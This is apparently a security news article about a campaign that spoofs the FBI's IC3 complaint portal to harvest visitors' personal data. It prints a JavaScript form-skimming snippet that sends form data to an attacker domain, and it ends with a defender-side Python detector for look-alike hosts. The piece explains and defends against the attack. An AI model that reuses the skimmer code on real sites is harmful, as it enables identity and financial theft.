Threat Actors Impersonate FBI IC3 Website to Steal The Visitors’ Personal Information



A spoofing campaign targeting the Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3) has been identified. Starting mid-September 2025, access attempts to IC3’s official portal redirected users to fraudulent domains mimicking the legitimate site.

The impersonators used domain names resembling the legitimate one, such as “ic3-gov.com” and “ic3gov.org,” and copied authentic branding elements like the FBI seal and IC3 banner. Personal data entered by visitors was harvested for identity theft and financial fraud.

IC3 analysts detected these fraudulent sites on September 18, 2025. Visitors reported receiving deceptive emails falsely confirming IC3 report submissions, which linked to cloned pages demanding extensive personally identifiable information (PII).

The campaign’s payload exfiltrated all form data to attacker-controlled servers. IC3 researchers observed that the spoofed infrastructure was hosted with bulletproof providers, allowing rapid domain rotation and minimal takedown potential.

Victims unknowingly provided names, addresses, phone numbers, email credentials, Social Security numbers, and banking details, transmitted in clear text over HTTP. Some cloned pages contained additional JavaScript modules capturing keystrokes and cookies.

Infection Mechanism and Data Harvesting

The malicious sites combined phishing lures with client-side scripting. A JavaScript snippet intercepted form submissions, rerouted the user's input to an exfiltration endpoint, and then either let the original submission proceed or displayed a generic error so the victim noticed nothing.

document.querySelector('form#complaintForm').addEventListener('submit', function(evt) {
  evt.preventDefault();
  var formData = new FormData(this);
  fetch('https://malicious-ic3[.]net/collect', {
    method: 'POST',
    body: formData
  }).then(() => this.submit());
});

This method captures data without alerting victims; an additional injected listener on all input fields logs keystrokes as they are typed. Because the script is embedded directly in the page's HTML rather than delivered as a binary, traditional antivirus solutions struggle to detect it.

Network analysis confirmed successful data exfiltration through repeated POST requests to the malicious domain. Professionals are advised to verify the URL in the address bar, confirm that the connection uses HTTPS with a valid certificate issued for the .gov domain, and report suspicious IC3-branded pages to the FBI.
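As an added defender-side illustration that is not part of the original article, the Python below normalizes hostnames so that variants like “ic3-gov.com” and “ic3gov.org” are compared against the real ic3.gov, then scans a few constructed proxy-log lines for POST requests to such look-alike hosts. The log lines and the function names are assumptions for the example.

```python
from urllib.parse import urlsplit

LEGIT_HOST = "ic3.gov"  # the only legitimate IC3 portal

# Constructed sample proxy-log lines ("METHOD URL STATUS"); not taken from the article.
SAMPLE_LOG = """\
POST http://ic3-gov.com/complaint 200
GET https://www.ic3.gov/Home/ComplaintChoice 200
POST https://ic3gov.org/collect 200
POST https://malicious-ic3.net/collect 200
GET https://example.org/ 200
"""


def normalize(host: str) -> str:
    """Lowercase, drop a leading 'www.' and strip hyphens so 'ic3-gov.com' and 'ic3gov.org' look alike."""
    host = host.lower()
    if host.startswith("www."):
        host = host[4:]
    return host.replace("-", "")


def is_lookalike(host: str) -> bool:
    """True for hosts that borrow the IC3 brand but are not ic3.gov or one of its subdomains.

    The check is deliberately broad (any 'ic3' in the registered domain) because a
    defender would rather review a false positive than miss a spoofed portal.
    """
    h = normalize(host)
    if h == LEGIT_HOST or h.endswith("." + LEGIT_HOST):
        return False
    registered = ".".join(h.split(".")[-2:])  # e.g. 'ic3gov.org', 'maliciousic3.net'
    return "ic3" in registered


def suspicious_posts(log_text: str) -> list:
    """Return the URLs of POST requests sent to look-alike hosts (form data leaving toward a spoof)."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] != "POST":
            continue
        url = parts[1]
        if is_lookalike(urlsplit(url).hostname or ""):
            hits.append(url)
    return hits
```

A real deployment would feed proxy or DNS logs into suspicious_posts and alert on every hit, since legitimate IC3 submissions never go anywhere but ic3.gov.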
